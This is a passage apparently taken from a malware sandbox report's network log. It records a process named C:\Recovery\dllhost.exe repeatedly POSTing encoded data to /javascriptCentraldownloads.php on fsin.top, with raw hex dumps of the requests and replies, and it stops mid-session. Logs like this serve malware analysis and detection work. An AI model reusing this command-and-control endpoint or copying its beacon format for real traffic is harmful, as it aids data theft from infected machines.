                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=toaK8iD67TBxfQ9SjjQSJUIWweuZLD95bwrY61fUU9GNhFq5dJ%2BR9U6N1gBTCm%2FyEoK7VRUuz45k11iQjXWSfXrVi3xHLI9HpSgsE4k4nwYkVThd78JvgRJVmA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8ac37a112e5ac461-EWR
                                                  alt-svc: h2=":443"; ma=60
                                                  Data Raw: 39 38 0d 0a 02 1f 21 09 24 28 3e 1c 36 5c 3b 0a 29 0c 0c 0f 3d 55 20 5e 2a 29 3b 5f 25 02 0f 5b 25 16 0e 55 35 3f 22 04 26 3f 26 55 27 21 35 06 3e 37 21 51 04 11 26 5b 34 0d 00 15 2a 07 33 11 30 28 0d 12 37 26 24 59 26 33 25 1d 20 2a 23 07 29 1c 1b 59 2b 31 2f 1f 2e 2b 05 5d 2a 23 27 05 25 1c 2a 56 0d 17 22 56 2d 38 3f 08 30 1c 2f 08 34 3f 37 54 23 15 32 04 2a 3f 2d 03 3e 24 3e 10 2e 23 0d 1c 29 55 2e 56 2b 04 26 07 2b 2a 0b 54 26 29 22 5d 2c 03 2d 48 0e 3d 59 4d 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 98!$(>6\;)=U ^*);_%[%U5?"&?&U'!5>7!Q&[4*30(7&$Y&3% *#)Y+1/.+]*#'%*V"V-8?0/4?7T#2*?->$>.#)U.V+&+*T&)"],-H=YM0


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  10 | 192.168.2.4 | 49746 | 172.67.203.2 | 80 | 7288 | C:\Recovery\dllhost.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Aug 1, 2024 07:37:32.063025951 CEST | 274 | OUT | POST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1008
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Aug 1, 2024 07:37:32.412626982 CEST1008OUTData Raw: 54 52 58 5d 5a 55 5d 51 5c 5e 5a 51 54 56 57 57 57 55 5e 59 56 55 51 54 5b 5d 5f 5a 5b 59 5b 55 5c 5d 5e 5c 5a 5e 51 51 5b 53 51 5c 54 51 5e 56 52 5d 5c 57 58 56 58 59 57 58 54 5d 59 59 5c 58 5b 53 5a 58 5f 56 57 50 59 5c 42 5b 43 53 43 5c 55 53
                                                  Data Ascii: TRX]ZU]Q\^ZQTVWWWU^YVUQT[]_Z[Y[U\]^\Z^QQ[SQ\TQ^VR]\WXVXYWXT]YY\X[SZX_VWPY\B[CSC\USUWV^]_VQ_Z[VPT[_X]P^BQ_U_T^P]_]\^_QYTQTCX]P^X]TP]US[[YG][X_^XXV\T@^TZE\[GSY]^QDY\][XQ\V[PXZ^P[^ZUSZS^S"Z0!=\!-'$%;+]*>&)%?W&>Y1#;$671&G#.X!4
                                                  Aug 1, 2024 07:37:32.512762070 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:37:32.761178970 CEST | 584 | IN | HTTP/1.1 200 OK
                                                  Date: Thu, 01 Aug 2024 05:37:32 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0PbZkiuqVLNl3CXfWHvSK43AmWbF6HYcAnubyYTlm6e3AIqmqS%2F7ZmZkGeCUPUR4S2jAfFoqVYwp%2FrsYXWikiSeCYA5RNeTJhoDB%2B7UTlGmap2NcTrVPVQGvLQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8ac37a11ee377ca0-EWR
                                                  alt-svc: h2=":443"; ma=60
                                                  Data Raw: 34 0d 0a 30 57 5b 59 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 40W[Y0


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  11 | 192.168.2.4 | 49747 | 172.67.203.2 | 80 | 7288 | C:\Recovery\dllhost.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Aug 1, 2024 07:37:32.930990934 CEST | 250 | OUT | POST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1012
                                                  Expect: 100-continue
                                                  Aug 1, 2024 07:37:33.287221909 CEST1012OUTData Raw: 54 50 58 5d 5a 5a 58 57 5c 5e 5a 51 54 5f 57 56 57 52 5e 58 56 59 51 5a 5b 5d 5f 5a 5b 59 5b 55 5c 5d 5e 5c 5a 5e 51 51 5b 53 51 5c 54 51 5e 56 52 5d 5c 57 58 56 58 59 57 58 54 5d 59 59 5c 58 5b 53 5a 58 5f 56 57 50 59 5c 42 5b 43 53 43 5c 55 53
                                                  Data Ascii: TPX]ZZXW\^ZQT_WVWR^XVYQZ[]_Z[Y[U\]^\Z^QQ[SQ\TQ^VR]\WXVXYWXT]YY\X[SZX_VWPY\B[CSC\USUWV^]_VQ_Z[VPT[_X]P^BQ_U_T^P]_]\^_QYTQTCX]P^X]TP]US[[YG][X_^XXV\T@^TZE\[GSY]^QDY\][XQ\V[PXZ^P[^ZUSZS^S"'&"[(&5<<;!)C"%(&<>Y$#<R,.!;8&&G#.X!
                                                  Aug 1, 2024 07:37:33.384648085 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:37:33.629328966 CEST | 588 | IN | HTTP/1.1 200 OK
                                                  Date: Thu, 01 Aug 2024 05:37:33 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=q46iyt1%2FF4b3UanryKwYb6QHoa5Iig6s1dndiw7zuBtBCD6A5uZZTREZ1BYBw8xwTgV%2FhCPEu9ReMv%2FCLmULzl9ckw%2BPt6kOxLA0ni%2BDjj3trgLjlEDmUNKbGw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8ac37a175ffe4241-EWR
                                                  alt-svc: h2=":443"; ma=60
                                                  Data Raw: 34 0d 0a 30 57 5b 59 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 40W[Y0


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  12 | 192.168.2.4 | 49748 | 172.67.203.2 | 80 | 7288 | C:\Recovery\dllhost.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Aug 1, 2024 07:37:33.763864994 CEST | 274 | OUT | POST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1012
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Aug 1, 2024 07:37:34.115207911 CEST1012OUTData Raw: 51 50 5d 55 5a 5e 58 51 5c 5e 5a 51 54 57 57 55 57 5f 5e 56 56 5a 51 5c 5b 5d 5f 5a 5b 59 5b 55 5c 5d 5e 5c 5a 5e 51 51 5b 53 51 5c 54 51 5e 56 52 5d 5c 57 58 56 58 59 57 58 54 5d 59 59 5c 58 5b 53 5a 58 5f 56 57 50 59 5c 42 5b 43 53 43 5c 55 53
                                                  Data Ascii: QP]UZ^XQ\^ZQTWWUW_^VVZQ\[]_Z[Y[U\]^\Z^QQ[SQ\TQ^VR]\WXVXYWXT]YY\X[SZX_VWPY\B[CSC\USUWV^]_VQ_Z[VPT[_X]P^BQ_U_T^P]_]\^_QYTQTCX]P^X]TP]US[[YG][X_^XXV\T@^TZE\[GSY]^QDY\][XQ\V[PXZ^P[^ZUSZS^S"%"Z506/_(]*>C"\1#S1=2U3-.8!/'5&G#.X!
                                                  Aug 1, 2024 07:37:34.253196955 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:37:34.499845982 CEST | 588 | IN | HTTP/1.1 200 OK
                                                  Date: Thu, 01 Aug 2024 05:37:34 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Xz%2F3t9lNvkui9qtB1bz0pWXz4Xs7jONjIBE3bxMZlS%2Be9JPMmj9ca7%2F4FqmYqHNq8K5pOqi3aWkLNZXrz8zWheK3kQtm%2BLy3x%2BPNLmtfGXJi6HtJQdKBAhScQg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8ac37a1cce484235-EWR
                                                  alt-svc: h2=":443"; ma=60
                                                  Data Raw: 34 0d 0a 30 57 5b 59 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 40W[Y0


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  13 | 192.168.2.4 | 49749 | 172.67.203.2 | 80 | 7288 | C:\Recovery\dllhost.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Aug 1, 2024 07:37:34.659676075 CEST | 274 | OUT | POST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1008
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Aug 1, 2024 07:37:35.007155895 CEST1008OUTData Raw: 54 50 58 54 5a 5f 5d 54 5c 5e 5a 51 54 56 57 5a 57 5f 5e 5f 56 5e 51 5c 5b 5d 5f 5a 5b 59 5b 55 5c 5d 5e 5c 5a 5e 51 51 5b 53 51 5c 54 51 5e 56 52 5d 5c 57 58 56 58 59 57 58 54 5d 59 59 5c 58 5b 53 5a 58 5f 56 57 50 59 5c 42 5b 43 53 43 5c 55 53
                                                  Data Ascii: TPXTZ_]T\^ZQTVWZW_^_V^Q\[]_Z[Y[U\]^\Z^QQ[SQ\TQ^VR]\WXVXYWXT]YY\X[SZX_VWPY\B[CSC\USUWV^]_VQ_Z[VPT[_X]P^BQ_U_T^P]_]\^_QYTQTCX]P^X]TP]US[[YG][X_^XXV\T@^TZE\[GSY]^QDY\][XQ\V[PXZ^P[^ZUSZS^S"'1*6=[3%$?8!)C:2'&/& +/(!;+%&G#.X!
                                                  Aug 1, 2024 07:37:35.318316936 CEST1008OUTData Raw: 54 50 58 54 5a 5f 5d 54 5c 5e 5a 51 54 56 57 5a 57 5f 5e 5f 56 5e 51 5c 5b 5d 5f 5a 5b 59 5b 55 5c 5d 5e 5c 5a 5e 51 51 5b 53 51 5c 54 51 5e 56 52 5d 5c 57 58 56 58 59 57 58 54 5d 59 59 5c 58 5b 53 5a 58 5f 56 57 50 59 5c 42 5b 43 53 43 5c 55 53
                                                  Data Ascii: TPXTZ_]T\^ZQTVWZW_^_V^Q\[]_Z[Y[U\]^\Z^QQ[SQ\TQ^VR]\WXVXYWXT]YY\X[SZX_VWPY\B[CSC\USUWV^]_VQ_Z[VPT[_X]P^BQ_U_T^P]_]\^_QYTQTCX]P^X]TP]US[[YG][X_^XXV\T@^TZE\[GSY]^QDY\][XQ\V[PXZ^P[^ZUSZS^S"'1*6=[3%$?8!)C:2'&/& +/(!;+%&G#.X!
                                                  Aug 1, 2024 07:37:36.037077904 CEST1008OUTData Raw: 54 50 58 54 5a 5f 5d 54 5c 5e 5a 51 54 56 57 5a 57 5f 5e 5f 56 5e 51 5c 5b 5d 5f 5a 5b 59 5b 55 5c 5d 5e 5c 5a 5e 51 51 5b 53 51 5c 54 51 5e 56 52 5d 5c 57 58 56 58 59 57 58 54 5d 59 59 5c 58 5b 53 5a 58 5f 56 57 50 59 5c 42 5b 43 53 43 5c 55 53
                                                  Data Ascii: TPXTZ_]T\^ZQTVWZW_^_V^Q\[]_Z[Y[U\]^\Z^QQ[SQ\TQ^VR]\WXVXYWXT]YY\X[SZX_VWPY\B[CSC\USUWV^]_VQ_Z[VPT[_X]P^BQ_U_T^P]_]\^_QYTQTCX]P^X]TP]US[[YG][X_^XXV\T@^TZE\[GSY]^QDY\][XQ\V[PXZ^P[^ZUSZS^S"'1*6=[3%$?8!)C:2'&/& +/(!;+%&G#.X!
                                                  Aug 1, 2024 07:37:36.038152933 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:37:36.038538933 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:37:36.039092064 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:37:36.358661890 CEST | 580 | IN | HTTP/1.1 200 OK
                                                  Date: Thu, 01 Aug 2024 05:37:36 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Tt0SXot6jPX67kIk8wKxaDZFoNsP8D%2BNpzanCzhWvxagQfjsYfI7Xy4betRW1vpnbNdLxNRk8wrKrIYK1JS3PRHIPwQZtvRAjSBVi1vFklVhHZIbbyD4rGlzlQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8ac37a225da08c5f-EWR
                                                  alt-svc: h2=":443"; ma=60
                                                  Data Raw: 34 0d 0a 30 57 5b 59 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 40W[Y0


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  14 | 192.168.2.4 | 49750 | 172.67.203.2 | 80 | 7288 | C:\Recovery\dllhost.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Aug 1, 2024 07:37:36.506774902 CEST | 274 | OUT | POST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1012
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Aug 1, 2024 07:37:36.868524075 CEST1012OUTData Raw: 51 50 5d 55 5a 5a 5d 50 5c 5e 5a 51 54 52 57 52 57 53 5e 5c 56 5a 51 5b 5b 5d 5f 5a 5b 59 5b 55 5c 5d 5e 5c 5a 5e 51 51 5b 53 51 5c 54 51 5e 56 52 5d 5c 57 58 56 58 59 57 58 54 5d 59 59 5c 58 5b 53 5a 58 5f 56 57 50 59 5c 42 5b 43 53 43 5c 55 53
                                                  Data Ascii: QP]UZZ]P\^ZQTRWRWS^\VZQ[[]_Z[Y[U\]^\Z^QQ[SQ\TQ^VR]\WXVXYWXT]YY\X[SZX_VWPY\B[CSC\USUWV^]_VQ_Z[VPT[_X]P^BQ_U_T^P]_]\^_QYTQTCX]P^X]TP]US[[YG][X_^XXV\T@^TZE\[GSY]^QDY\][XQ\V[PXZ^P[^ZUSZS^S"Y$5\!0+(+5)%5%^<%/Z1##/./\58'%5&G#.X!4
                                                  Aug 1, 2024 07:37:36.951000929 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:37:37.202982903 CEST | 590 | IN | HTTP/1.1 200 OK
                                                  Date: Thu, 01 Aug 2024 05:37:37 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2sjA8sFVPfXPTha7RRFHgKYbd%2FWSuojksHBeYX6sB4KUGMNk%2BuTz%2BL8GiuqWVQbza2FPLR%2FUpiG%2BthgpyNwxOH6VyLtQLA%2B6Rlgyidd3gt4z5dLUYwEs4jKuCw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8ac37a2dacb67281-EWR
                                                  alt-svc: h2=":443"; ma=60
                                                  Data Raw: 34 0d 0a 30 57 5b 59 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 40W[Y0
                                                  Aug 1, 2024 07:37:37.430175066 CEST | 590 | IN | HTTP/1.1 200 OK
                                                  Date: Thu, 01 Aug 2024 05:37:37 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2sjA8sFVPfXPTha7RRFHgKYbd%2FWSuojksHBeYX6sB4KUGMNk%2BuTz%2BL8GiuqWVQbza2FPLR%2FUpiG%2BthgpyNwxOH6VyLtQLA%2B6Rlgyidd3gt4z5dLUYwEs4jKuCw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8ac37a2dacb67281-EWR
                                                  alt-svc: h2=":443"; ma=60
                                                  Data Raw: 34 0d 0a 30 57 5b 59 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 40W[Y0


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  15 | 192.168.2.4 | 49751 | 172.67.203.2 | 80 | 7288 | C:\Recovery\dllhost.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Aug 1, 2024 07:37:37.556901932 CEST | 274 | OUT | POST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1012
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  16 | 192.168.2.4 | 49752 | 172.67.203.2 | 80 | 7288 | C:\Recovery\dllhost.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Aug 1, 2024 07:37:37.778748035 CEST | 274 | OUT | POST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1264
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Aug 1, 2024 07:37:38.131108046 CEST1264OUTData Raw: 51 54 58 5d 5a 59 5d 57 5c 5e 5a 51 54 52 57 56 57 53 5e 5e 56 54 51 5f 5b 5d 5f 5a 5b 59 5b 55 5c 5d 5e 5c 5a 5e 51 51 5b 53 51 5c 54 51 5e 56 52 5d 5c 57 58 56 58 59 57 58 54 5d 59 59 5c 58 5b 53 5a 58 5f 56 57 50 59 5c 42 5b 43 53 43 5c 55 53
                                                  Data Ascii: QTX]ZY]W\^ZQTRWVWS^^VTQ_[]_Z[Y[U\]^\Z^QQ[SQ\TQ^VR]\WXVXYWXT]YY\X[SZX_VWPY\B[CSC\USUWV^]_VQ_Z[VPT[_X]P^BQ_U_T^P]_]\^_QYTQTCX]P^X]TP]US[[YG][X_^XXV\T@^TZE\[GSY]^QDY\][XQ\V[PXZ^P[^ZUSZS^S"^39".7'5]?;*"2+S1Y62U<;<!;7'5&G#.X!4
                                                  Aug 1, 2024 07:37:38.255567074 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:37:38.502506971 CEST | 737 | IN | HTTP/1.1 200 OK
                                                  Date: Thu, 01 Aug 2024 05:37:38 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aYCXuNhg82%2F1WcFMo75AC4tnA7lMhEYqd6ZpnNpcaPN2lJpVa4xJ%2B%2BbPVKY126w4lZeYfuL%2FgwmAK0%2FMryaFIEeCewxGoPHyI4S8K94NcatqKQjePr29dEXmIQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8ac37a35cce09dff-EWR
                                                  alt-svc: h2=":443"; ma=60
                                                  Data Raw: 39 38 0d 0a 02 1f 22 50 30 3b 3d 0c 20 39 2c 19 29 21 3d 50 29 23 2b 03 3c 07 2b 59 25 3f 26 03 27 38 37 0e 22 5a 2e 04 30 01 21 0f 25 31 31 06 29 37 21 51 04 11 25 03 37 33 07 04 3e 29 01 59 30 38 02 00 20 08 38 59 27 33 07 57 21 29 20 5c 3e 32 39 13 2b 31 2f 1c 3a 05 3b 58 28 30 2c 5b 32 36 2a 56 0d 17 21 0c 2c 28 15 09 24 0b 27 08 23 5a 3f 55 37 15 2d 5c 28 2c 21 03 28 37 26 1d 39 20 3f 11 3d 20 39 0f 2a 2d 2a 00 2b 3a 0b 55 33 29 22 5d 2c 03 2d 48 0e 3d 59 4d 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 98"P0;= 9,)!=P)#+<+Y%?&'87"Z.0!%11)7!Q%73>)Y08 8Y'3W!) \>29+1/:;X(0,[26*V!,($'#Z?U7-\(,!(7&9 ?= 9*-*+:U3)"],-H=YM0


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  17 | 192.168.2.4 | 49753 | 172.67.203.2 | 80 | 7288 | C:\Recovery\dllhost.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Aug 1, 2024 07:37:38.004004002 CEST | 274 | OUT | POST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1012
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Aug 1, 2024 07:37:38.349797010 CEST1012OUTData Raw: 54 5f 5d 57 5a 5d 58 5d 5c 5e 5a 51 54 50 57 55 57 53 5e 5d 56 54 51 54 5b 5d 5f 5a 5b 59 5b 55 5c 5d 5e 5c 5a 5e 51 51 5b 53 51 5c 54 51 5e 56 52 5d 5c 57 58 56 58 59 57 58 54 5d 59 59 5c 58 5b 53 5a 58 5f 56 57 50 59 5c 42 5b 43 53 43 5c 55 53
                                                  Data Ascii: T_]WZ]X]\^ZQTPWUWS^]VTQT[]_Z[Y[U\]^\Z^QQ[SQ\TQ^VR]\WXVXYWXT]YY\X[SZX_VWPY\B[CSC\USUWV^]_VQ_Z[VPT[_X]P^BQ_U_T^P]_]\^_QYTQTCX]P^X]TP]US[[YG][X_^XXV\T@^TZE\[GSY]^QDY\][XQ\V[PXZ^P[^ZUSZS^S"Z'-]6-(3/Y+(==>2(S1)%<W,-8"8?Y&5&G#.X!<
                                                  Aug 1, 2024 07:37:38.470388889 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:37:38.692760944 CEST | 592 | IN | HTTP/1.1 200 OK
                                                  Date: Thu, 01 Aug 2024 05:37:38 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KxDECQgjvIBezzXY%2FmzMP%2F5ssqN5xg6Cl%2FUF1mnzIbJJ%2B4ly2fEtIX1BUQ020CrjhayGcJOhepmQGwOeDsEVmA%2B0svy3t8ja26cEnvTIcC%2B%2FE8fmhMcprbpuTA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8ac37a372b9d433a-EWR
                                                  alt-svc: h2=":443"; ma=60
                                                  Data Raw: 34 0d 0a 30 57 5b 59 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 40W[Y0


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  18 | 192.168.2.4 | 49754 | 172.67.203.2 | 80 | 7288 | C:\Recovery\dllhost.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Aug 1, 2024 07:37:38.831669092 CEST | 250 | OUT | POST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1012
                                                  Expect: 100-continue
                                                  Aug 1, 2024 07:37:39.177818060 CEST1012OUTData Raw: 51 57 5d 50 5a 59 58 55 5c 5e 5a 51 54 57 57 53 57 54 5e 5e 56 58 51 5f 5b 5d 5f 5a 5b 59 5b 55 5c 5d 5e 5c 5a 5e 51 51 5b 53 51 5c 54 51 5e 56 52 5d 5c 57 58 56 58 59 57 58 54 5d 59 59 5c 58 5b 53 5a 58 5f 56 57 50 59 5c 42 5b 43 53 43 5c 55 53
                                                  Data Ascii: QW]PZYXU\^ZQTWWSWT^^VXQ_[]_Z[Y[U\]^\Z^QQ[SQ\TQ^VR]\WXVXYWXT]YY\X[SZX_VWPY\B[CSC\USUWV^]_VQ_Z[VPT[_X]P^BQ_U_T^P]_]\^_QYTQTCX]P^X]TP]US[[YG][X_^XXV\T@^TZE\[GSY]^QDY\][XQ\V[PXZ^P[^ZUSZS^S"0)_#=(['5'?*U*%&?&"Z1#+/.0!/%&G#.X!
                                                  Aug 1, 2024 07:37:39.284020901 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:37:39.525305033 CEST | 592 | IN | HTTP/1.1 200 OK
                                                  Date: Thu, 01 Aug 2024 05:37:39 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=n27FqcnRBhJjYvNfWTHVaI%2FgwskZzxU4WRQqY1qn2nGPj8CYoWs%2BSmCIvOps4s4y52w%2Fa9jKkx2j20cfM9xes%2FGlH%2FsQJGg2A5x32xZjciugeJhY%2FPdi%2BJvhqg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8ac37a3c39bd17f9-EWR
                                                  alt-svc: h2=":443"; ma=60
                                                  Data Raw: 34 0d 0a 30 57 5b 59 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 40W[Y0


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  19 | 192.168.2.4 | 49755 | 172.67.203.2 | 80 | 7288 | C:\Recovery\dllhost.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Aug 1, 2024 07:37:39.709321976 CEST | 274 | OUT | POST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1012
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Aug 1, 2024 07:37:40.068468094 CEST1012OUTData Raw: 51 52 58 51 5a 5a 5d 53 5c 5e 5a 51 54 57 57 53 57 5f 5e 57 56 59 51 58 5b 5d 5f 5a 5b 59 5b 55 5c 5d 5e 5c 5a 5e 51 51 5b 53 51 5c 54 51 5e 56 52 5d 5c 57 58 56 58 59 57 58 54 5d 59 59 5c 58 5b 53 5a 58 5f 56 57 50 59 5c 42 5b 43 53 43 5c 55 53
